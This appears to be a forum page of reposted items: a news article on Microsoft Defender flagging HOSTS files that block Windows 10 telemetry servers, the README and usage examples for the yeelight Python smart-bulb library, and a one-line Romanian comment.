  13. Starting at the end of July, Microsoft has begun detecting HOSTS files that block Windows 10 telemetry servers as a 'Severe' security risk. The HOSTS file is a text file located at C:\Windows\system32\driver\etc\HOSTS and can only be edited by a program with Administrator privileges. This file is used to resolve hostnames to IP addresses without using the Domain Name System (DNS). This file is commonly used to block a computer from accessing a remote site by assigning host to the 127.0.0.1 or 0.0.0.0 IP address. For example, if you add the following line to the Windows HOSTS file, it will block users from accessing www.google.com as your browsers will think you are trying to connect to 127.0.0.1, which is the local computer. 127.0.0.1 www.google.com Microsoft now detects HOSTS files that block Windows telemetry Since the end of July, Windows 10 users began reporting that Windows Defender had started detecting modified HOSTS files as a 'SettingsModifier:Win32/HostsFileHijack' threat. When detected, if a user clicks on the 'See details' option, they will simply be shown that they are affected by a 'Settings Modifier' threat and has 'potentially unwanted behavior,' as shown below. SettingsModifier:Win32/HostsFileHijack detection BleepingComputer first learned about this issue from BornCity, and while Microsoft Defender detecting HOSTS hijacks is not new, it was strange to see so many people suddenly reporting the detection [1, 2, 3, 4, 5]. While a widespread infection hitting many consumers simultaneously in the past is not unheard of, it is quite unusual with the security built into Windows 10 today. This led me to believe it was a false positive or some other non-malicious issue. After playing with generic HOSTS file modifications such as blocking BleepingComputer and other sites, I tried adding a blocklist for Microsoft's telemetry to my HOSTS file. This list adds many Microsoft servers used by the Windows operating system and Microsoft software to send telemetry and user data back to Microsoft. As soon as I saved the HOSTS file, I received the following alert stating that I could not save the file as it "contains a virus or potentially unwanted software." I also received alerts that my computer was infected with 'SettingsModifier:Win32/HostsFileHijack.'' HOSTS file blocked from being saved So it seems that Microsoft had recently updated their Microsoft Defender definitions to detect when their servers were added to the HOSTS file. Users who utilize HOSTS files to block Windows 10 telemetry suddenly caused them to see the HOSTS file hijack detection. In our tests, some of the Microsoft hosts detected in the Windows 10 HOSTS file include the following: www.microsoft.com microsoft.com telemetry.microsoft.com wns.notify.windows.com.akadns.net v10-win.vortex.data.microsoft.com.akadns.net us.vortex-win.data.microsoft.com us-v10.events.data.microsoft.com urs.microsoft.com.nsatc.net watson.telemetry.microsoft.com watson.ppe.telemetry.microsoft.com vsgallery.com watson.live.com watson.microsoft.com telemetry.remoteapp.windowsazure.com telemetry.urs.microsoft.com If you decide to clean this threat, Microsoft will restore the HOSTS file back to its default contents. Default Windows 10 HOSTS file Users who intentionally modify their HOSTS file can allow this 'threat,' but it may enable all HOSTS modifications, even malicious ones, going forward. So only allow the threat if you 100% understand the risks involved in doing so. BleepingComputer has reached out to Microsoft with questions regarding this new detection. Via bleepingcomputer.com
  14. The YeeLight Python library is a small library that lets you control your YeeLight RGB LED bulbs over WiFi. The latest version can be found at: https://gitlab.com/stavros/python-yeelight To see a real-world usage example, have a look at yeecli, a command-line YeeLight utility that uses this library. yeelight currently does not support some features of the YeeLight API, such as discovery, but is mostly otherwise complete. Installation To install yeelight, you can use pip: pip install yeelight That’s all that’s required to install the library. Usage First of all, you need to discover your bulb’s IP. If you already know it, you can skip to the next section. Discovering all the devices on your network and their capabilities is easy with discover_bulbs: >>> from yeelight import discover_bulbs >>> discover_bulbs() [{'capabilities': {'bright': '50', 'color_mode': '1', 'ct': '2700', 'fw_ver': '45', 'hue': '359', 'id': '0x0000000002dfb19a', 'model': 'color', 'name': 'bedroom', 'power': 'off', 'rgb': '16711935', 'sat': '100', 'support': 'get_prop set_default set_power toggle ' 'set_bright start_cf stop_cf set_scene cron_add ' 'cron_get cron_del set_ct_abx set_rgb set_hsv ' 'set_adjust set_music set_name'}, 'ip': '192.168.0.19', 'port': 55443}, {'capabilities': {'bright': '50', 'color_mode': '1', 'ct': '2700', 'fw_ver': '45', 'hue': '359', 'id': '0x0000000002dfb2f1', 'model': 'color', 'name': 'livingroom', 'power': 'off', 'rgb': '16711935', 'sat': '100', 'support': 'get_prop set_default set_power toggle ' 'set_bright start_cf stop_cf set_scene cron_add ' 'cron_get cron_del set_ct_abx set_rgb set_hsv ' 'set_adjust set_music set_name'}, 'ip': '192.168.0.23', 'port': 55443}] That’s it, now you know the addresses of all the bulbs on your local network. Now that you’ve discovered your bulb’s IP, it’s time to instantiate a new Bulb: >>> from yeelight import Bulb >>> bulb = Bulb("192.168.0.19") # Turn the bulb on. >>> bulb.turn_on() # Turn the bulb off. >>> bulb.turn_off() # Toggle power. >>> bulb.toggle() # Set brightness to 50%. >>> bulb.set_brightness(50) # Set brightness of the background light to 50%, if your # light supports it. >>> from yeelight import LightType >>> bulb.set_brightness(50, light_type=LightType.Ambient) # Set RGB value. >>> bulb.set_rgb(255, 0, 0) # Set HSV value. >>> bulb.set_hsv(320, 100, 50) # Set hue and saturation, but keep value (brightness) the same. >>> bulb.set_hsv(320, 100) # Set color temperature. >>> bulb.set_color_temp(4700) # Save this setting as default. >>> bulb.set_default() For efficiency, yeelight will use a single TCP connection for all the above commands. However, this means that, if there’s an error, a command could raise a socket.error exception and need to be retried. Note that YeeLight connections are rate-limited to 60 per minute. If you need your connection to not have a limit, you need to use Music mode. For a complete list of the commands you can issue, see the API reference. By default, yeelight will refuse to make any changes to the bulb if it’s off: >>> bulb.set_brightness(10) AssertionError: Commands have no effect when the bulb is off. You can check the bulb’s state by reading its properties: >>> bulb.get_properties() {'bright': u'10', 'color_mode': u'2', 'ct': u'2700', 'delayoff': u'0', 'flowing': u'0', 'hue': u'300', 'music_on': u'0', 'name': u'My light', 'power': u'off', 'rgb': u'16737280', 'sat': u'100'} Notice that the properties don’t include flow_params by default, as that causes problems. If you want that, specify it as an argument to get_properties(). If you want to always turn the bulb on before running a command, set auto_on to True. This will refresh the bulb’s properties before most calls, and will cost you an extra message per command, so watch out for rate-limiting: >>> bulb.auto_on = True # Or, when instantiating: >>> bulb = Bulb("192.168.0.19", auto_on=True) # This will work even if the bulb is off. >>> bulb.set_brightness(10) For documentation of the Flow feature, see Working with Flow. Effects yeelight provides full support for effects. Effects control whether the bulb changes from one state to the other immediately or gradually, and how long the gradual change takes. You can either specify effects to run by default when instantiating, or with each call: >>> bulb = Bulb("192.168.0.19", effect="smooth", duration=1000) # This will turn the bulb on gradually within one second: >>> bulb.turn_on() # This will turn the bulb on immediately: >>> bulb.turn_on(effect="sudden") # You can easily change the default effect, too: >>> bulb.effect = "sudden" # This will turn the bulb off immediately: >>> bulb.turn_off() There are two effect types, "sudden" and "smooth". The "sudden" type ignores the duration parameter. Keep in mind that the effect and duration parameters must be passed by keyword. Notifications To get read-time state update notifications, run listen in a Thread: >>> import threading >>> thread = threading.Thread(target=bulb.listen, args=(callback,)) >>> thread.start() # To stop listening: >>> bulb.stop_listening() Note that the callback function should take one parameter, which will be a dict containing the new/updated parameters. It will be called when last_properties is updated. You can also use asyncio event loop: >>> import asyncio >>> async def main(): >>> loop = asyncio.get_running_loop() >>> await loop.run_in_executor(None, bulb.listen, callback) >>> asyncio.run(main()) # To stop listening in an event loop: >>> await loop.run_in_executor(None, bulb.stop_listening) Download: git@gitlab.com:stavros/python-yeelight.git https://gitlab.com/stavros/python-yeelight.git Source
  15. Incearca facial recognition, cont verificat si auto-report asta in cazul in care nu este vorba lui Napoleon
×
×
  • Create New...